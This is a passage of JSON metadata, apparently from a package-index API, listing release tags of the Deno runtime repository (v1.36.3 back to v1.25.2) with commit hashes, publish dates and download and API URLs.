ag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.36.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.36.3/manifests"},{"name":"v1.36.2","sha":"a7f5244a72cc6c00949c02a180d0d9cdf2bf1672","kind":"commit","published_at":"2023-08-21T13:39:22.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.36.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.36.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.36.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.36.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.36.2/manifests"},{"name":"v1.36.1","sha":"9f1455b75087e9e41a995bbb6a8a7f3059a0185a","kind":"commit","published_at":"2023-08-10T10:53:54.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.36.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.36.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.36.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.36.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.36.1/manifests"},{"name":"v1.36.0","sha":"6ba245fe2570b29e35a4fd296a196a58870b1e3c","kind":"commit","published_at":"2023-08-03T16:26:25.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.36.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.36.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.36.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.36.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.36.0/manifests"},{"name":"v1.35.3","sha":"2e7254f2a60239603a2c6fea75cc71fbf6226470","kind":"commit","published_at":"2023-07-26T14:46:23.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.35.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.35.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.35.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.35.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.35.3/manifests"},{"name":"v1.35.2","sha":"60fe8aa5325345fc07c997b2dba169e45b87a863","kind":"commit","published_at":"2023-07-20T01:29:23.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.35.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.35.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.35.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.35.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.35.2/manifests"},{"name":"v1.35.1","sha":"b4824bf45f3d12e1b53e7eb5afcd49c38a575210","kind":"commit","published_at":"2023-07-12T21:49:48.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.35.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.35.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.35.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.35.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.35.1/manifests"},{"name":"v1.35.0","sha":"1ac5fddf54a828f1372e1ff10559d1a4bc70e5c9","kind":"commit","published_at":"2023-07-04T23:58:01.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.35.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.35.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.35.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.35.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.35.0/manifests"},{"name":"v1.34.3","sha":"ef24d1a0b7fb7f3297cbda1d80df6e1f72bef252","kind":"commit","published_at":"2023-06-15T22:16:32.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.34.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.34.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.34.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.34.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.34.3/manifests"},{"name":"v1.34.2","sha":"acf5d44a221b84e92bd0f6b1be5e6b08fcfb5a32","kind":"commit","published_at":"2023-06-09T00:13:59.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.34.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.34.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.34.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.34.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.34.2/manifests"},{"name":"v1.34.1","sha":"ea6cd3f1fccd5a621582788a4949d40d5fcdcd1b","kind":"commit","published_at":"2023-05-29T23:30:46.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.34.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.34.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.34.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.34.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.34.1/manifests"},{"name":"v1.34.0","sha":"935071dd0e233a55c93ca4792f9210f0ea6bccc6","kind":"commit","published_at":"2023-05-24T23:38:01.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.34.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.34.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.34.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.34.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.34.0/manifests"},{"name":"v1.33.4","sha":"5be97b7584c712848336da90077db86fe4859d96","kind":"commit","published_at":"2023-05-18T16:21:18.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.33.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.33.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.33.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.33.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.33.4/manifests"},{"name":"v1.33.3","sha":"12ba2d311bb6cce7c1bf2567748987e91585d540","kind":"commit","published_at":"2023-05-12T11:06:53.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.33.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.33.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.33.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.33.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.33.3/manifests"},{"name":"v1.33.2","sha":"c2a61a4192609615beba363f5606e6e04ae60c97","kind":"commit","published_at":"2023-05-04T14:39:05.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.33.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.33.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.33.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.33.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.33.2/manifests"},{"name":"v1.33.1","sha":"d5f52ef7ac20cb116fad574e3017f194124be312","kind":"commit","published_at":"2023-04-28T17:05:46.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.33.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.33.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.33.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.33.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.33.1/manifests"},{"name":"v1.33.0","sha":"39ece1fe0ddacc2cbf182403c9e7085bc01df5a6","kind":"commit","published_at":"2023-04-27T23:18:57.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.33.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.33.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.33.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.33.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.33.0/manifests"},{"name":"v1.32.5","sha":"6cfca9b33eb0647fc73ddfc20349ae9fb943d01a","kind":"commit","published_at":"2023-04-18T18:31:30.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.32.5","html_url":"https://github.com/denoland/deno/releases/tag/v1.32.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.32.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.32.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.32.5/manifests"},{"name":"v1.32.4","sha":"709cfd6d91d335c16337be9339d45250e02ae247","kind":"commit","published_at":"2023-04-12T15:17:55.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.32.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.32.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.32.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.32.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.32.4/manifests"},{"name":"v1.32.3","sha":"73d472149ce6dd360a71ca5d1819d3f8f27754f8","kind":"commit","published_at":"2023-04-01T22:51:46.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.32.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.32.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.32.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.32.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.32.3/manifests"},{"name":"v1.32.2","sha":"24e0b31096682f0ec576e0021c1925611ec4e090","kind":"commit","published_at":"2023-03-31T20:41:10.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.32.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.32.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.32.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.32.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.32.2/manifests"},{"name":"v1.32.1","sha":"99b5eaa2f4f81b0f6fb46a388808a0d8f40b91e1","kind":"commit","published_at":"2023-03-23T20:00:23.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.32.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.32.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.32.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.32.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.32.1/manifests"},{"name":"v1.32.0","sha":"d06fdf6add1b3c55fc5f4a24956f17a363d513a4","kind":"commit","published_at":"2023-03-22T23:03:38.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.32.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.32.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.32.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.32.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.32.0/manifests"},{"name":"v1.31.3","sha":"f64adbe1a3b924b9436afa39b4302c5718bbb759","kind":"commit","published_at":"2023-03-16T05:41:00.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.31.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.31.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.31.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.31.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.31.3/manifests"},{"name":"v1.31.2","sha":"fc6edac5978e7a5e44fdcee05085c7492f0ccba9","kind":"commit","published_at":"2023-03-10T06:41:43.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.31.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.31.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.31.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.31.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.31.2/manifests"},{"name":"v1.31.1","sha":"86785f21194460d713276dca212302fa1bb1c943","kind":"commit","published_at":"2023-02-25T02:17:58.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.31.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.31.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.31.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.31.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.31.1/manifests"},{"name":"v1.31.0","sha":"b6ac54815c1bcfa44a45b3f2c1c982829482477f","kind":"commit","published_at":"2023-02-24T00:20:54.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.31.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.31.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.31.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.31.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.31.0/manifests"},{"name":"v1.30.3","sha":"f3fb8ee18826e66d3896ea864d2bedaed6c79308","kind":"commit","published_at":"2023-02-07T01:20:18.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.30.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.30.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.30.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.30.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.30.3/manifests"},{"name":"v1.30.2","sha":"cee13304ffe58286fcfab3526c46f95a7e23825d","kind":"commit","published_at":"2023-02-03T14:46:31.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.30.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.30.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.30.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.30.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.30.2/manifests"},{"name":"v1.30.1","sha":"000fb83c587a17118d83b990f1d08c98bb9cce2a","kind":"commit","published_at":"2023-02-02T14:26:43.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.30.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.30.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.30.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.30.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.30.1/manifests"},{"name":"v1.30.0","sha":"a6f915c22f34921780b4bcb8b6da8cd3bd20d5a8","kind":"commit","published_at":"2023-01-25T23:15:08.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.30.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.30.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.30.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.30.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.30.0/manifests"},{"name":"v1.29.4","sha":"65db94feba9d4d51a09b74629f566dbc90484fba","kind":"commit","published_at":"2023-01-16T22:07:42.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.29.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.29.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.29.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.29.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.29.4/manifests"},{"name":"v1.29.3","sha":"9806dcc91496ab12c7fba238d411e23c22e2a302","kind":"commit","published_at":"2023-01-13T17:17:13.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.29.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.29.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.29.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.29.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.29.3/manifests"},{"name":"v1.29.2","sha":"14c4c8f9340235bd1ddb5388558c984beb0bb6d9","kind":"commit","published_at":"2023-01-05T13:37:23.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.29.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.29.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.29.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.29.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.29.2/manifests"},{"name":"v1.29.1","sha":"145013ab7fb00c7293ce33806f26dc4083a8da66","kind":"commit","published_at":"2022-12-15T16:32:14.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.29.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.29.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.29.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.29.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.29.1/manifests"},{"name":"v1.29.0","sha":"0d4e4af7acf82c1365999a7281910daa05f0e982","kind":"commit","published_at":"2022-12-14T23:22:54.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.29.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.29.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.29.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.29.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.29.0/manifests"},{"name":"v1.28.3","sha":"74064c9d8c222b33b2a552ea0af1054f57002a96","kind":"commit","published_at":"2022-12-01T10:10:17.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.28.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.28.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.28.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.28.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.28.3/manifests"},{"name":"v1.28.2","sha":"1aca16e23998ee54f6a15217cd4cc6b8b13299b7","kind":"commit","published_at":"2022-11-24T20:22:47.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.28.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.28.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.28.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.28.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.28.2/manifests"},{"name":"v1.28.1","sha":"2743d42099cb0596f03c7d1252e5cfbb53f7a9ec","kind":"commit","published_at":"2022-11-16T23:35:35.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.28.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.28.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.28.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.28.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.28.1/manifests"},{"name":"v1.28.0","sha":"916598f8a77d1fb7b7feb577e600ead2bc45045f","kind":"commit","published_at":"2022-11-13T20:31:36.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.28.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.28.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.28.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.28.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.28.0/manifests"},{"name":"v1.27.2","sha":"5cd5cfa8d655e8a71441cf9736df93efde75153c","kind":"commit","published_at":"2022-11-08T21:42:25.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.27.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.27.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.27.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.27.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.27.2/manifests"},{"name":"v1.27.1","sha":"d448c2950db2ed474405ace6a0a180301eeaa68d","kind":"commit","published_at":"2022-11-03T21:52:08.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.27.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.27.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.27.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.27.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.27.1/manifests"},{"name":"v1.27.0","sha":"b0fb8fa9dc08640e77eb0ab888a483db18a52a4b","kind":"commit","published_at":"2022-10-27T15:13:26.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.27.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.27.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.27.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.27.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.27.0/manifests"},{"name":"v1.26.2","sha":"d1f432bf12e5de645d45f1f2738a53981f39fa5b","kind":"commit","published_at":"2022-10-17T18:51:49.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.26.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.26.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.26.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.26.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.26.2/manifests"},{"name":"v1.26.1","sha":"753b60dd9b0c9bb5220609f2fe65ad06957690d6","kind":"commit","published_at":"2022-10-06T17:16:43.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.26.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.26.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.26.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.26.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.26.1/manifests"},{"name":"v1.26.0","sha":"d8827514ffef04c2e1732f7033ff6a374dd94d54","kind":"commit","published_at":"2022-09-28T22:10:44.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.26.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.26.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.26.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.26.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.26.0/manifests"},{"name":"v1.25.4","sha":"02afbe2af550ad5223d982e8fdd37f778b9d828c","kind":"commit","published_at":"2022-09-22T18:01:52.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.25.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.25.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.25.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.25.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.25.4/manifests"},{"name":"v1.25.3","sha":"f561e765a75c749f1d1e2d6584edf6018435e6e1","kind":"commit","published_at":"2022-09-15T17:46:30.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.25.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.25.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.25.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.25.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.25.3/manifests"},{"name":"v1.25.2","sha":"3c5af2ba495b2d5770b3f5ed12e202ba2089ebda","kind":"commit","published_at":"2022-09-09T08:54:05.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.25.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.25.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.25.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/